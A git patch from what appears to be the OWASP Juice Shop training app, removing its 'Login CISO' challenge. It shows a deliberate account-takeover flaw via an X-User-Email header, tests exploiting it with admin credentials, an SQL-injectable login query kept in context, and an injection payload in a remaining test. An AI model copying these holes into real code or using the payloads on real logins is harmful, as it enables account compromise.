From 2c3c498501c7964aac84ab324ea8836b95faadf8 Mon Sep 17 00:00:00 2001 From: Bjoern Kimminich Date: Wed, 28 Apr 2021 08:14:21 +0200 Subject: [PATCH] Remove CISO login challenge (resolves #1491) --- config.schema.yml | 5 ----- config/fbctf.yml | 3 --- data/static/challenges.yml | 11 ----------- routes/login.ts | 9 +-------- test/api/loginApiSpec.ts | 19 ------------------- test/e2e/loginSpec.ts | 30 ------------------------------ 6 files changed, 1 insertion(+), 76 deletions(-) diff --git a/config.schema.yml b/config.schema.yml index 8bad8fbb0b8..cf674d6c5b9 100644 --- a/config.schema.yml +++ b/config.schema.yml @@ -381,11 +381,6 @@ ctf: type: string code: type: string - loginCisoChallenge: - name: - type: string - code: - type: string loginSupportChallenge: name: type: string diff --git a/config/fbctf.yml b/config/fbctf.yml index b40fc3c86a0..762fbe3fab6 100644 --- a/config/fbctf.yml +++ b/config/fbctf.yml @@ -132,9 +132,6 @@ ctf: oauthUserPasswordChallenge: name: South Sudan code: SS - loginCisoChallenge: - name: Angola - code: AO loginSupportChallenge: name: Croatia code: HR diff --git a/data/static/challenges.yml b/data/static/challenges.yml index ff23755e8b6..41f2b8c489d 100644 --- a/data/static/challenges.yml +++ b/data/static/challenges.yml @@ -470,17 +470,6 @@ hintUrl: 'https://pwning.owasp-juice.shop/part2/broken-authentication.html#log-in-with-bjoerns-gmail-account' mitigationUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html' key: oauthUserPasswordChallenge -- - name: 'Login CISO' - category: 'Broken Authentication' - tags: - - Code Analysis - description: 'Exploit OAuth 2.0 to log in with the Chief Information Security Officer''s user account.' - difficulty: 5 - hint: 'Don''t try to beat Google''s OAuth 2.0 service. Rather investigate implementation flaws on OWASP Juice Shop''s end.' - hintUrl: 'https://pwning.owasp-juice.shop/part2/broken-authentication.html#exploit-oauth-20-to-log-in-with-the-cisos-user-account' - mitigationUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html' - key: loginCisoChallenge - name: 'Login Jim' category: 'Injection' diff --git a/routes/login.ts b/routes/login.ts index 2801350481e..3ca5f225aeb 100644 --- a/routes/login.ts +++ b/routes/login.ts @@ -30,14 +30,7 @@ module.exports = function login () { models.sequelize.query(`SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL`, { model: models.User, plain: true }) // vuln-code-snippet vuln-line loginAdminChallenge loginBenderChallenge loginJimChallenge .then((authenticatedUser) => { let user = utils.queryResultToJson(authenticatedUser) - const rememberedEmail = security.userEmailFrom(req) - if (rememberedEmail && req.body.oauth) { - models.User.findOne({ where: { email: rememberedEmail } }).then(rememberedUser => { - user = utils.queryResultToJson(rememberedUser) - utils.solveIf(challenges.loginCisoChallenge, () => { return user.data.id === users.ciso.id }) // vuln-code-snippet hide-line - afterLogin(user, res, next) - }) - } else if (user.data?.id && user.data.totpSecret !== '') { + if (user.data?.id && user.data.totpSecret !== '') { res.status(401).json({ status: 'totp_token_required', data: { diff --git a/test/api/loginApiSpec.ts b/test/api/loginApiSpec.ts index 34bbe4e2ed2..5dddd2b91ea 100644 --- a/test/api/loginApiSpec.ts +++ b/test/api/loginApiSpec.ts @@ -11,11 +11,6 @@ const config = require('config') const API_URL = 'http://localhost:3000/api' const REST_URL = 'http://localhost:3000/rest' -const customHeader = { - 'X-User-Email': 'ciso@' + config.get('application.domain'), - Authorization: 'Bearer ' + security.authorize(), - 'content-type': 'application/json' -} const jsonHeader = { 'content-type': 'application/json' } describe('/rest/user/login', () => { @@ -240,20 +235,6 @@ describe('/rest/user/login', () => { }) .expect('status', 401) }) - - it('POST OAuth login as admin@juice-sh.op with "Remember me" exploit to log in as ciso@' + config.get('application.domain'), () => { - return frisby.post(REST_URL + '/user/login', { - headers: customHeader, - body: { - email: 'admin@' + config.get('application.domain'), - password: 'admin123', - oauth: true - } - }) - .expect('status', 200) - .expect('header', 'content-type', /application\/json/) - .expect('json', 'authentication', { umail: 'ciso@' + config.get('application.domain') }) - }) }) describe('/rest/saveLoginIp', () => { diff --git a/test/e2e/loginSpec.ts b/test/e2e/loginSpec.ts index 3cac48e3e80..7a320d29dc8 100644 --- a/test/e2e/loginSpec.ts +++ b/test/e2e/loginSpec.ts @@ -139,36 +139,6 @@ describe('/#/login', () => { protractor.expect.challengeSolved({ challenge: 'Login Bjoern' }) }) - describe('challenge "loginCiso"', () => { - it('should be able to log in as ciso@juice-sh.op by using "Remember me" in combination with (fake) OAuth login with another user', () => { - email.sendKeys(`ciso@${config.get('application.domain')}`) - password.sendKeys('wrong') - browser.executeScript('document.getElementById("rememberMe-input").removeAttribute("class");') - rememberMeCheckbox.click() - loginButton.click() - - browser.executeScript(baseUrl => { - const xhttp = new XMLHttpRequest() - xhttp.onreadystatechange = function () { - if (this.status === 200) { - console.log('Success') - } - } - xhttp.open('POST', `${baseUrl}/rest/user/login`, true) - xhttp.setRequestHeader('Content-type', 'application/json') - xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`) - xhttp.setRequestHeader('X-User-Email', localStorage.getItem('email')) - xhttp.send(JSON.stringify({ email: 'admin@juice-sh.op', password: 'admin123', oauth: true })) - }, browser.baseUrl) - - // Deselect to clear email field for subsequent tests - rememberMeCheckbox.click() - loginButton.click() - }) - - protractor.expect.challengeSolved({ challenge: 'Login CISO' }) - }) - describe('challenge "ghostLogin"', () => { it('should be able to log in as chris.pike@juice-sh.op by using `\' or deletedAt IS NOT NULL --`', () => { email.sendKeys('\' or deletedAt IS NOT NULL--')